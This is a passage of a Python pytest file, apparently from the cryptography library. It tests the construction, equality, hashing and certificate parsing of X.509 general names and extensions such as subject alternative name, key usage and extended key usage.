        )
        ext = cert.extensions
        with pytest.raises(x509.ExtensionNotFound) as exc:
            ext.get_extension_for_oid(ExtensionOID.KEY_USAGE)
        assert exc.value.oid == ExtensionOID.KEY_USAGE

    def test_all_purposes(self, backend):
        # Fixture sets every keyUsage bit, including encipher/decipher_only.
        cert = _load_cert(
            os.path.join("x509", "custom", "all_key_usages.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        extensions = cert.extensions
        ext = extensions.get_extension_for_oid(ExtensionOID.KEY_USAGE)
        assert ext is not None
        ku = ext.value
        assert ku.digital_signature is True
        assert ku.content_commitment is True
        assert ku.key_encipherment is True
        assert ku.data_encipherment is True
        assert ku.key_agreement is True
        assert ku.key_cert_sign is True
        assert ku.crl_sign is True
        assert ku.encipher_only is True
        assert ku.decipher_only is True

    def test_key_cert_sign_crl_sign(self, backend):
        cert = _load_cert(
            os.path.join(
                "x509", "PKITS_data", "certs", "pathLenConstraint6CACert.crt"
            ),
            x509.load_der_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(ExtensionOID.KEY_USAGE)
        assert ext is not None
        assert ext.critical is True
        ku = ext.value
        assert ku.digital_signature is False
        assert ku.content_commitment is False
        assert ku.key_encipherment is False
        assert ku.data_encipherment is False
        assert ku.key_agreement is False
        assert ku.key_cert_sign is True
        assert ku.crl_sign is True
class TestDNSName(object):
    """Construction, comparison, and hashing of DNSName general names."""

    def test_non_a_label(self):
        """Unicode (U-label) input is rejected; values must be A-labels."""
        with pytest.raises(ValueError):
            x509.DNSName(".\xf5\xe4\xf6\xfc.example.com")

    def test_init(self):
        """A-label strings are stored verbatim; non-str types are rejected."""
        name = x509.DNSName("*.xn--4ca7aey.example.com")
        assert name.value == "*.xn--4ca7aey.example.com"
        for bad in (1.3, b"bytes not allowed"):
            with pytest.raises(TypeError):
                x509.DNSName(bad)  # type:ignore[arg-type]

    def test_ne(self):
        first, second, third = (
            x509.DNSName("test1"),
            x509.DNSName("test2"),
            x509.DNSName("test2"),
        )
        assert first != second
        assert not (second != third)

    def test_hash(self):
        first, second, third = (
            x509.DNSName("test1"),
            x509.DNSName("test2"),
            x509.DNSName("test2"),
        )
        assert hash(first) != hash(second)
        assert hash(second) == hash(third)
class TestDirectoryName(object):
    """Construction, equality, hashing, and repr of DirectoryName."""

    def test_not_name(self):
        # Only x509.Name values are accepted.
        with pytest.raises(TypeError):
            x509.DirectoryName(b"notaname")  # type:ignore[arg-type]
        with pytest.raises(TypeError):
            x509.DirectoryName(1.3)  # type:ignore[arg-type]

    def test_repr(self):
        name = x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, "value1")])
        gn = x509.DirectoryName(name)
        assert repr(gn) == "<DirectoryName(value=<Name(CN=value1)>)>"

    def test_eq(self):
        name = x509.Name(
            [x509.NameAttribute(x509.ObjectIdentifier("2.999.1"), "value1")]
        )
        name2 = x509.Name(
            [x509.NameAttribute(x509.ObjectIdentifier("2.999.1"), "value1")]
        )
        gn = x509.DirectoryName(name)
        gn2 = x509.DirectoryName(name2)
        assert gn == gn2

    def test_ne(self):
        name = x509.Name(
            [x509.NameAttribute(x509.ObjectIdentifier("2.999.1"), "value1")]
        )
        name2 = x509.Name(
            [x509.NameAttribute(x509.ObjectIdentifier("2.999.2"), "value2")]
        )
        gn = x509.DirectoryName(name)
        gn2 = x509.DirectoryName(name2)
        assert gn != gn2
        assert gn != object()

    def test_hash(self):
        name = x509.Name(
            [x509.NameAttribute(x509.ObjectIdentifier("2.999.1"), "value1")]
        )
        name2 = x509.Name(
            [x509.NameAttribute(x509.ObjectIdentifier("2.999.2"), "value2")]
        )
        gn = x509.DirectoryName(name)
        gn2 = x509.DirectoryName(name)
        gn3 = x509.DirectoryName(name2)
        assert hash(gn) == hash(gn2)
        assert hash(gn) != hash(gn3)
class TestRFC822Name(object):
    """Construction, validation, equality, and hashing of RFC822Name."""

    def test_repr(self):
        gn = x509.RFC822Name("string")
        assert repr(gn) == "<RFC822Name(value='string')>"

    def test_equality(self):
        gn = x509.RFC822Name("string")
        gn2 = x509.RFC822Name("string2")
        gn3 = x509.RFC822Name("string")
        assert gn != gn2
        assert gn != object()
        assert gn == gn3

    def test_not_text(self):
        with pytest.raises(TypeError):
            x509.RFC822Name(1.3)  # type:ignore[arg-type]
        with pytest.raises(TypeError):
            x509.RFC822Name(b"bytes")  # type:ignore[arg-type]

    def test_invalid_email(self):
        # Display-name form and the empty string are rejected.
        with pytest.raises(ValueError):
            x509.RFC822Name("Name <email>")
        with pytest.raises(ValueError):
            x509.RFC822Name("")

    def test_single_label(self):
        # A bare local part with no @domain is accepted.
        gn = x509.RFC822Name("administrator")
        assert gn.value == "administrator"

    def test_non_a_label(self):
        # Unicode (U-label) domains are rejected; A-labels are required.
        with pytest.raises(ValueError):
            x509.RFC822Name("email@em\xe5\xefl.com")

    def test_hash(self):
        g1 = x509.RFC822Name("[email protected]")
        g2 = x509.RFC822Name("[email protected]")
        g3 = x509.RFC822Name("[email protected]")
        assert hash(g1) == hash(g2)
        assert hash(g1) != hash(g3)
class TestUniformResourceIdentifier(object):
    """Construction, validation, equality, and hashing of URI names."""

    def test_equality(self):
        gn = x509.UniformResourceIdentifier("string")
        gn2 = x509.UniformResourceIdentifier("string2")
        gn3 = x509.UniformResourceIdentifier("string")
        assert gn != gn2
        assert gn != object()
        assert gn == gn3

    def test_not_text(self):
        with pytest.raises(TypeError):
            x509.UniformResourceIdentifier(1.3)  # type:ignore[arg-type]

    def test_no_parsed_hostname(self):
        # A value with no scheme/hostname is stored verbatim.
        gn = x509.UniformResourceIdentifier("singlelabel")
        assert gn.value == "singlelabel"

    def test_with_port(self):
        gn = x509.UniformResourceIdentifier("singlelabel:443/test")
        assert gn.value == "singlelabel:443/test"

    def test_non_a_label(self):
        # Unicode (U-label) hostnames are rejected; A-labels are required.
        with pytest.raises(ValueError):
            x509.UniformResourceIdentifier(
                "http://\u043f\u044b\u043a\u0430.cryptography"
            )

    def test_empty_hostname(self):
        # Schemes with an empty authority (e.g. ldap:///) are allowed.
        gn = x509.UniformResourceIdentifier("ldap:///some-nonsense")
        assert gn.value == "ldap:///some-nonsense"

    def test_hash(self):
        g1 = x509.UniformResourceIdentifier("http://host.com")
        g2 = x509.UniformResourceIdentifier("http://host.com")
        g3 = x509.UniformResourceIdentifier("http://other.com")
        assert hash(g1) == hash(g2)
        assert hash(g1) != hash(g3)

    def test_repr(self):
        gn = x509.UniformResourceIdentifier("string")
        assert repr(gn) == ("<UniformResourceIdentifier(value='string')>")
class TestRegisteredID(object):
    """Construction, equality, hashing, and repr of RegisteredID."""

    def test_not_oid(self):
        # Only ObjectIdentifier values are accepted.
        with pytest.raises(TypeError):
            x509.RegisteredID(b"notanoid")  # type:ignore[arg-type]
        with pytest.raises(TypeError):
            x509.RegisteredID(1.3)  # type:ignore[arg-type]

    def test_repr(self):
        gn = x509.RegisteredID(NameOID.COMMON_NAME)
        assert repr(gn) == (
            "<RegisteredID(value=<ObjectIdentifier(oid=2.5.4.3, name=commonNam"
            "e)>)>"
        )

    def test_eq(self):
        gn = x509.RegisteredID(NameOID.COMMON_NAME)
        gn2 = x509.RegisteredID(NameOID.COMMON_NAME)
        assert gn == gn2

    def test_ne(self):
        gn = x509.RegisteredID(NameOID.COMMON_NAME)
        gn2 = x509.RegisteredID(ExtensionOID.BASIC_CONSTRAINTS)
        assert gn != gn2
        assert gn != object()

    def test_hash(self):
        gn = x509.RegisteredID(NameOID.COMMON_NAME)
        gn2 = x509.RegisteredID(NameOID.COMMON_NAME)
        gn3 = x509.RegisteredID(ExtensionOID.BASIC_CONSTRAINTS)
        assert hash(gn) == hash(gn2)
        assert hash(gn) != hash(gn3)
class TestIPAddress(object):
    """Construction, equality, hashing, and repr of IPAddress names
    for IPv4/IPv6 addresses and networks."""

    def test_not_ipaddress(self):
        # Only ipaddress address/network objects are accepted.
        with pytest.raises(TypeError):
            x509.IPAddress(b"notanipaddress")  # type:ignore[arg-type]
        with pytest.raises(TypeError):
            x509.IPAddress(1.3)  # type:ignore[arg-type]

    def test_repr(self):
        gn = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
        assert repr(gn) == "<IPAddress(value=127.0.0.1)>"

        gn2 = x509.IPAddress(ipaddress.IPv6Address("ff::"))
        assert repr(gn2) == "<IPAddress(value=ff::)>"

        gn3 = x509.IPAddress(ipaddress.IPv4Network("192.168.0.0/24"))
        assert repr(gn3) == "<IPAddress(value=192.168.0.0/24)>"

        gn4 = x509.IPAddress(ipaddress.IPv6Network("ff::/96"))
        assert repr(gn4) == "<IPAddress(value=ff::/96)>"

    def test_eq(self):
        gn = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
        gn2 = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
        assert gn == gn2

    def test_ne(self):
        gn = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
        gn2 = x509.IPAddress(ipaddress.IPv4Address("127.0.0.2"))
        assert gn != gn2
        assert gn != object()

    def test_hash(self):
        gn = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
        gn2 = x509.IPAddress(ipaddress.IPv4Address("127.0.0.1"))
        gn3 = x509.IPAddress(ipaddress.IPv4Address("127.0.0.2"))
        assert hash(gn) == hash(gn2)
        assert hash(gn) != hash(gn3)
class TestOtherName(object):
    """Tests for x509.OtherName (an ObjectIdentifier type-id plus raw DER bytes)."""

    def test_invalid_args(self):
        # type_id must be an ObjectIdentifier; value must be bytes.
        with pytest.raises(TypeError):
            x509.OtherName(
                b"notanobjectidentifier",  # type:ignore[arg-type]
                b"derdata",
            )
        with pytest.raises(TypeError):
            x509.OtherName(
                x509.ObjectIdentifier("1.2.3.4"),
                "notderdata",  # type:ignore[arg-type]
            )

    def test_repr(self):
        # Unregistered OIDs render as "Unknown OID"; registered ones
        # (2.5.4.65 -> pseudonym) use their symbolic name.
        gn = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
        assert repr(gn) == (
            "<OtherName(type_id=<ObjectIdentifier(oid=1.2.3.4, "
            "name=Unknown OID)>, value=b'derdata')>"
        )
        gn = x509.OtherName(x509.ObjectIdentifier("2.5.4.65"), b"derdata")
        assert repr(gn) == (
            "<OtherName(type_id=<ObjectIdentifier(oid=2.5.4.65, "
            "name=pseudonym)>, value=b'derdata')>"
        )

    def test_eq(self):
        # Equal when both type_id and value match.
        gn = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
        gn2 = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
        assert gn == gn2

    def test_ne(self):
        # Unequal when either component differs, or against foreign types.
        gn = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
        assert gn != object()
        gn2 = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata2")
        assert gn != gn2
        gn2 = x509.OtherName(x509.ObjectIdentifier("1.2.3.5"), b"derdata")
        assert gn != gn2

    def test_hash(self):
        # Hash is derived from (type_id, value).
        gn = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
        gn2 = x509.OtherName(x509.ObjectIdentifier("1.2.3.4"), b"derdata")
        gn3 = x509.OtherName(x509.ObjectIdentifier("1.2.3.5"), b"derdata")
        assert hash(gn) == hash(gn2)
        assert hash(gn) != hash(gn3)
class TestGeneralNames(object):
    """Tests for x509.GeneralNames: an ordered, hashable sequence of
    GeneralName objects supporting iteration, indexing, and type filtering."""

    def test_get_values_for_type(self):
        # Filtering by GeneralName subclass returns the raw values.
        gns = x509.GeneralNames([x509.DNSName("cryptography.io")])
        names = gns.get_values_for_type(x509.DNSName)
        assert names == ["cryptography.io"]

    def test_iter_names(self):
        # len() and iteration preserve construction order.
        gns = x509.GeneralNames(
            [x509.DNSName("cryptography.io"), x509.DNSName("crypto.local")]
        )
        assert len(gns) == 2
        assert list(gns) == [
            x509.DNSName("cryptography.io"),
            x509.DNSName("crypto.local"),
        ]

    def test_iter_input(self):
        # The constructor accepts any iterable, not just lists.
        names = [
            x509.DNSName("cryptography.io"),
            x509.DNSName("crypto.local"),
        ]
        gns = x509.GeneralNames(iter(names))
        assert list(gns) == names

    def test_indexing(self):
        # Supports negative indices and slicing with a step.
        gn = x509.GeneralNames(
            [
                x509.DNSName("cryptography.io"),
                x509.DNSName("crypto.local"),
                x509.DNSName("another.local"),
                x509.RFC822Name("[email protected]"),
                x509.UniformResourceIdentifier("http://another.local"),
            ]
        )
        assert gn[-1] == gn[4]
        assert gn[2:6:2] == [gn[2], gn[4]]

    def test_invalid_general_names(self):
        # Every element must be a GeneralName instance.
        with pytest.raises(TypeError):
            x509.GeneralNames(
                [
                    x509.DNSName("cryptography.io"),
                    "invalid",  # type:ignore[list-item]
                ]
            )

    def test_repr(self):
        gns = x509.GeneralNames([x509.DNSName("cryptography.io")])
        assert repr(gns) == (
            "<GeneralNames([<DNSName(value='cryptography.io')>])>"
        )

    def test_eq(self):
        gns = x509.GeneralNames([x509.DNSName("cryptography.io")])
        gns2 = x509.GeneralNames([x509.DNSName("cryptography.io")])
        assert gns == gns2

    def test_ne(self):
        gns = x509.GeneralNames([x509.DNSName("cryptography.io")])
        gns2 = x509.GeneralNames([x509.RFC822Name("[email protected]")])
        assert gns != gns2
        assert gns != object()

    def test_hash(self):
        # Hash is derived from the contained names.
        gns = x509.GeneralNames([x509.DNSName("cryptography.io")])
        gns2 = x509.GeneralNames([x509.DNSName("cryptography.io")])
        gns3 = x509.GeneralNames([x509.RFC822Name("[email protected]")])
        assert hash(gns) == hash(gns2)
        assert hash(gns) != hash(gns3)
class TestIssuerAlternativeName(object):
    """Tests for the IssuerAlternativeName extension value, which wraps a
    GeneralNames sequence and mirrors its sequence behavior."""

    def test_get_values_for_type(self):
        san = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
        names = san.get_values_for_type(x509.DNSName)
        assert names == ["cryptography.io"]

    def test_iter_names(self):
        # len() and iteration preserve construction order.
        san = x509.IssuerAlternativeName(
            [x509.DNSName("cryptography.io"), x509.DNSName("crypto.local")]
        )
        assert len(san) == 2
        assert list(san) == [
            x509.DNSName("cryptography.io"),
            x509.DNSName("crypto.local"),
        ]

    def test_indexing(self):
        # Supports negative indices and slicing with a step.
        ian = x509.IssuerAlternativeName(
            [
                x509.DNSName("cryptography.io"),
                x509.DNSName("crypto.local"),
                x509.DNSName("another.local"),
                x509.RFC822Name("[email protected]"),
                x509.UniformResourceIdentifier("http://another.local"),
            ]
        )
        assert ian[-1] == ian[4]
        assert ian[2:6:2] == [ian[2], ian[4]]

    def test_invalid_general_names(self):
        # Every element must be a GeneralName instance.
        with pytest.raises(TypeError):
            x509.IssuerAlternativeName(
                [
                    x509.DNSName("cryptography.io"),
                    "invalid",  # type:ignore[list-item]
                ]
            )

    def test_repr(self):
        san = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
        assert repr(san) == (
            "<IssuerAlternativeName("
            "<GeneralNames([<DNSName(value='cryptography.io')>])>)>"
        )

    def test_eq(self):
        san = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
        san2 = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
        assert san == san2

    def test_ne(self):
        san = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
        san2 = x509.IssuerAlternativeName(
            [x509.RFC822Name("[email protected]")]
        )
        assert san != san2
        assert san != object()

    def test_hash(self):
        # Hash is derived from the contained names.
        ian = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
        ian2 = x509.IssuerAlternativeName([x509.DNSName("cryptography.io")])
        ian3 = x509.IssuerAlternativeName(
            [x509.RFC822Name("[email protected]")]
        )
        assert hash(ian) == hash(ian2)
        assert hash(ian) != hash(ian3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestRSAIssuerAlternativeNameExtension(object):
    """Parses the IssuerAlternativeName extension out of a fixture
    certificate and checks the decoded URI general name."""

    def test_uri(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "ian_uri.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.ISSUER_ALTERNATIVE_NAME
        )
        assert list(ext.value) == [
            x509.UniformResourceIdentifier("http://path.to.root/root.crt"),
        ]
class TestCRLNumber(object):
    """Tests for the x509.CRLNumber extension value."""

    def test_eq(self):
        """Equal CRL numbers compare equal."""
        assert x509.CRLNumber(15) == x509.CRLNumber(15)

    def test_ne(self):
        """Different numbers — and foreign types — compare unequal."""
        fifteen = x509.CRLNumber(15)
        assert fifteen != x509.CRLNumber(14)
        assert fifteen != object()

    def test_repr(self):
        """repr() shows the bare integer."""
        assert repr(x509.CRLNumber(15)) == "<CRLNumber(15)>"

    def test_invalid_number(self):
        """Non-integer input must raise TypeError."""
        with pytest.raises(TypeError):
            x509.CRLNumber("notanumber")  # type:ignore[arg-type]

    def test_hash(self):
        """Hash tracks the wrapped integer."""
        one_a = x509.CRLNumber(1)
        one_b = x509.CRLNumber(1)
        two = x509.CRLNumber(2)
        assert hash(one_a) == hash(one_b)
        assert hash(one_a) != hash(two)
class TestSubjectAlternativeName(object):
    """Tests for the SubjectAlternativeName extension value, which wraps a
    GeneralNames sequence and mirrors its sequence behavior."""

    def test_get_values_for_type(self):
        san = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
        names = san.get_values_for_type(x509.DNSName)
        assert names == ["cryptography.io"]

    def test_iter_names(self):
        # len() and iteration preserve construction order.
        san = x509.SubjectAlternativeName(
            [x509.DNSName("cryptography.io"), x509.DNSName("crypto.local")]
        )
        assert len(san) == 2
        assert list(san) == [
            x509.DNSName("cryptography.io"),
            x509.DNSName("crypto.local"),
        ]

    def test_indexing(self):
        # Supports negative indices and slicing with a step.
        san = x509.SubjectAlternativeName(
            [
                x509.DNSName("cryptography.io"),
                x509.DNSName("crypto.local"),
                x509.DNSName("another.local"),
                x509.RFC822Name("[email protected]"),
                x509.UniformResourceIdentifier("http://another.local"),
            ]
        )
        assert san[-1] == san[4]
        assert san[2:6:2] == [san[2], san[4]]

    def test_invalid_general_names(self):
        # Every element must be a GeneralName instance.
        with pytest.raises(TypeError):
            x509.SubjectAlternativeName(
                [
                    x509.DNSName("cryptography.io"),
                    "invalid",  # type:ignore[list-item]
                ]
            )

    def test_repr(self):
        san = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
        assert repr(san) == (
            "<SubjectAlternativeName("
            "<GeneralNames([<DNSName(value='cryptography.io')>])>)>"
        )

    def test_eq(self):
        san = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
        san2 = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
        assert san == san2

    def test_ne(self):
        san = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
        san2 = x509.SubjectAlternativeName(
            [x509.RFC822Name("[email protected]")]
        )
        assert san != san2
        assert san != object()

    def test_hash(self):
        # Hash is derived from the contained names.
        san = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
        san2 = x509.SubjectAlternativeName([x509.DNSName("cryptography.io")])
        san3 = x509.SubjectAlternativeName(
            [x509.RFC822Name("[email protected]")]
        )
        assert hash(san) == hash(san2)
        assert hash(san) != hash(san3)
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestRSASubjectAlternativeNameExtension(object):
    """Parses the SubjectAlternativeName extension from fixture certificates
    covering each supported GeneralName variant (DNS, URI, IP, dirName,
    RFC822, registered ID, otherName), plus round-tripping via the cert
    builder."""

    def test_dns_name(self, backend):
        cert = _load_cert(
            os.path.join("x509", "cryptography.io.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        assert ext is not None
        assert ext.critical is False
        san = ext.value
        dns = san.get_values_for_type(x509.DNSName)
        assert dns == ["www.cryptography.io", "cryptography.io"]

    def test_wildcard_dns_name(self, backend):
        # Wildcard labels are preserved verbatim.
        cert = _load_cert(
            os.path.join("x509", "wildcard_san.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        dns = ext.value.get_values_for_type(x509.DNSName)
        assert dns == [
            "*.langui.sh",
            "langui.sh",
            "*.saseliminator.com",
            "saseliminator.com",
        ]

    def test_san_empty_hostname(self, backend):
        # An empty dNSName decodes to the empty string rather than erroring.
        cert = _load_cert(
            os.path.join("x509", "custom", "san_empty_hostname.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        san = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        dns = san.value.get_values_for_type(x509.DNSName)
        assert dns == [""]

    def test_san_wildcard_idna_dns_name(self, backend):
        # IDNA names are returned in their A-label (punycode) form.
        cert = _load_cert(
            os.path.join("x509", "custom", "san_wildcard_idna.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        dns = ext.value.get_values_for_type(x509.DNSName)
        assert dns == ["*.xn--80ato2c.cryptography"]

    def test_unsupported_gn(self, backend):
        # x400Address (CHOICE tag 3) is unsupported and surfaces as
        # UnsupportedGeneralNameType with the tag number attached.
        cert = _load_cert(
            os.path.join("x509", "san_x400address.der"),
            x509.load_der_x509_certificate,
            backend,
        )
        with pytest.raises(x509.UnsupportedGeneralNameType) as exc:
            cert.extensions
        assert exc.value.type == 3

    def test_registered_id(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "san_registered_id.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        assert ext is not None
        assert ext.critical is False
        san = ext.value
        rid = san.get_values_for_type(x509.RegisteredID)
        assert rid == [x509.ObjectIdentifier("1.2.3.4")]

    def test_uri(self, backend):
        # URIs keep their port, path, query, and fragment components.
        cert = _load_cert(
            os.path.join("x509", "custom", "san_uri_with_port.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        assert ext is not None
        uri = ext.value.get_values_for_type(x509.UniformResourceIdentifier)
        assert uri == [
            "gopher://xn--80ato2c.cryptography:70/path?q=s#hel" "lo",
            "http://someregulardomain.com",
        ]

    def test_ipaddress(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "san_ipaddr.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        assert ext is not None
        assert ext.critical is False
        san = ext.value
        ip = san.get_values_for_type(x509.IPAddress)
        assert [
            ipaddress.ip_address("127.0.0.1"),
            ipaddress.ip_address("ff::"),
        ] == ip

    def test_dirname(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "san_dirname.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        assert ext is not None
        assert ext.critical is False
        san = ext.value
        dirname = san.get_values_for_type(x509.DirectoryName)
        assert [
            x509.Name(
                [
                    x509.NameAttribute(NameOID.COMMON_NAME, "test"),
                    x509.NameAttribute(NameOID.ORGANIZATION_NAME, "Org"),
                    x509.NameAttribute(
                        NameOID.STATE_OR_PROVINCE_NAME, "Texas"
                    ),
                ]
            )
        ] == dirname

    def test_rfc822name(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "san_rfc822_idna.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        assert ext is not None
        assert ext.critical is False
        san = ext.value
        rfc822name = san.get_values_for_type(x509.RFC822Name)
        assert ["[email protected]"] == rfc822name

    def test_idna2003_invalid(self, backend):
        # IDNA2003-encoded names are not re-decoded; the raw A-label is kept.
        cert = _load_cert(
            os.path.join("x509", "custom", "san_idna2003_dnsname.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        san = cert.extensions.get_extension_for_class(
            x509.SubjectAlternativeName
        ).value
        assert len(san) == 1
        [name] = san
        assert name.value == "xn--k4h.ws"

    def test_unicode_rfc822_name_dns_name_uri(self, backend):
        # IDNA names appear in A-label form across all three name types.
        cert = _load_cert(
            os.path.join("x509", "custom", "san_idna_names.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        assert ext is not None
        rfc822_name = ext.value.get_values_for_type(x509.RFC822Name)
        dns_name = ext.value.get_values_for_type(x509.DNSName)
        uri = ext.value.get_values_for_type(x509.UniformResourceIdentifier)
        assert rfc822_name == ["[email protected]"]
        assert dns_name == ["xn--80ato2c.cryptography"]
        assert uri == ["https://www.xn--80ato2c.cryptography"]

    def test_rfc822name_dnsname_ipaddress_directoryname_uri(self, backend):
        # A single SAN carrying five different GeneralName variants.
        cert = _load_cert(
            os.path.join("x509", "custom", "san_email_dns_ip_dirname_uri.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        assert ext is not None
        assert ext.critical is False
        san = ext.value
        rfc822_name = san.get_values_for_type(x509.RFC822Name)
        uri = san.get_values_for_type(x509.UniformResourceIdentifier)
        dns = san.get_values_for_type(x509.DNSName)
        ip = san.get_values_for_type(x509.IPAddress)
        dirname = san.get_values_for_type(x509.DirectoryName)
        assert ["[email protected]"] == rfc822_name
        assert ["https://cryptography.io"] == uri
        assert ["cryptography.io"] == dns
        assert [
            x509.Name(
                [
                    x509.NameAttribute(NameOID.COMMON_NAME, "dirCN"),
                    x509.NameAttribute(
                        NameOID.ORGANIZATION_NAME, "Cryptographic Authority"
                    ),
                ]
            )
        ] == dirname
        assert [
            ipaddress.ip_address("127.0.0.1"),
            ipaddress.ip_address("ff::"),
        ] == ip

    def test_invalid_rfc822name(self, backend):
        # Malformed rfc822Name values are surfaced verbatim, not rejected.
        cert = _load_cert(
            os.path.join("x509", "custom", "san_rfc822_names.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        san = cert.extensions.get_extension_for_class(
            x509.SubjectAlternativeName
        ).value
        values = san.get_values_for_type(x509.RFC822Name)
        assert values == [
            "email",
            "email <email>",
            "email <email@email>",
            "email <[email protected]>",
            "myemail:",
        ]

    def test_other_name(self, backend):
        # otherName values keep their raw DER payload.
        cert = _load_cert(
            os.path.join("x509", "custom", "san_other_name.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.SUBJECT_ALTERNATIVE_NAME
        )
        assert ext is not None
        assert ext.critical is False
        expected = x509.OtherName(
            x509.ObjectIdentifier("1.2.3.4"), b"\x16\x0bHello World"
        )
        assert len(ext.value) == 1
        assert list(ext.value)[0] == expected
        othernames = ext.value.get_values_for_type(x509.OtherName)
        assert othernames == [expected]

    def test_certbuilder(self, backend):
        # Round trip: names added via the builder come back unchanged.
        sans = [
            "*.example.org",
            "*.xn--4ca7aey.example.com",
            "foobar.example.net",
        ]
        private_key = RSA_KEY_2048.private_key(backend)
        builder = _make_certbuilder(private_key)
        builder = builder.add_extension(
            SubjectAlternativeName(list(map(DNSName, sans))), True
        )
        cert = builder.sign(private_key, hashes.SHA1(), backend)
        result = [
            x.value
            for x in cert.extensions.get_extension_for_class(
                SubjectAlternativeName
            ).value
        ]
        assert result == sans
@pytest.mark.requires_backend_interface(interface=RSABackend)
@pytest.mark.requires_backend_interface(interface=X509Backend)
class TestExtendedKeyUsageExtension(object):
    """Parses the ExtendedKeyUsage extension from a fixture certificate and
    verifies the decoded OID list in order."""

    def test_eku(self, backend):
        cert = _load_cert(
            os.path.join("x509", "custom", "extended_key_usage.pem"),
            x509.load_pem_x509_certificate,
            backend,
        )
        ext = cert.extensions.get_extension_for_oid(
            ExtensionOID.EXTENDED_KEY_USAGE
        )
        assert ext is not None
        assert ext.critical is False
        # The fixture carries eight usages, including anyExtendedKeyUsage
        # (2.5.29.37.0) and Netscape server-gated crypto.
        assert [
            x509.ObjectIdentifier("1.3.6.1.5.5.7.3.1"),
            x509.ObjectIdentifier("1.3.6.1.5.5.7.3.2"),
            x509.ObjectIdentifier("1.3.6.1.5.5.7.3.3"),
            x509.ObjectIdentifier("1.3.6.1.5.5.7.3.4"),
            x509.ObjectIdentifier("1.3.6.1.5.5.7.3.9"),
            x509.ObjectIdentifier("1.3.6.1.5.5.7.3.8"),
            x509.ObjectIdentifier("2.5.29.37.0"),
            x509.ObjectIdentifier("2.16.840.1.113730.4.1"),
        ] == list(ext.value)
class TestAccessDescription(object):
    """Tests for x509.AccessDescription (an access-method OID paired with a
    GeneralName location), used by the AIA/SIA extensions."""

    def test_invalid_access_method(self):
        # access_method must be an ObjectIdentifier.
        with pytest.raises(TypeError):
            x509.AccessDescription(
                "notanoid", x509.DNSName("test")  # type:ignore[arg-type]
            )

    def test_invalid_access_location(self):
        # access_location must be a GeneralName.
        with pytest.raises(TypeError):
            x509.AccessDescription(
                AuthorityInformationAccessOID.CA_ISSUERS,
                "invalid",  # type:ignore[arg-type]
            )

    def test_valid_nonstandard_method(self):
        # Access methods are not restricted to the RFC 5280 set.
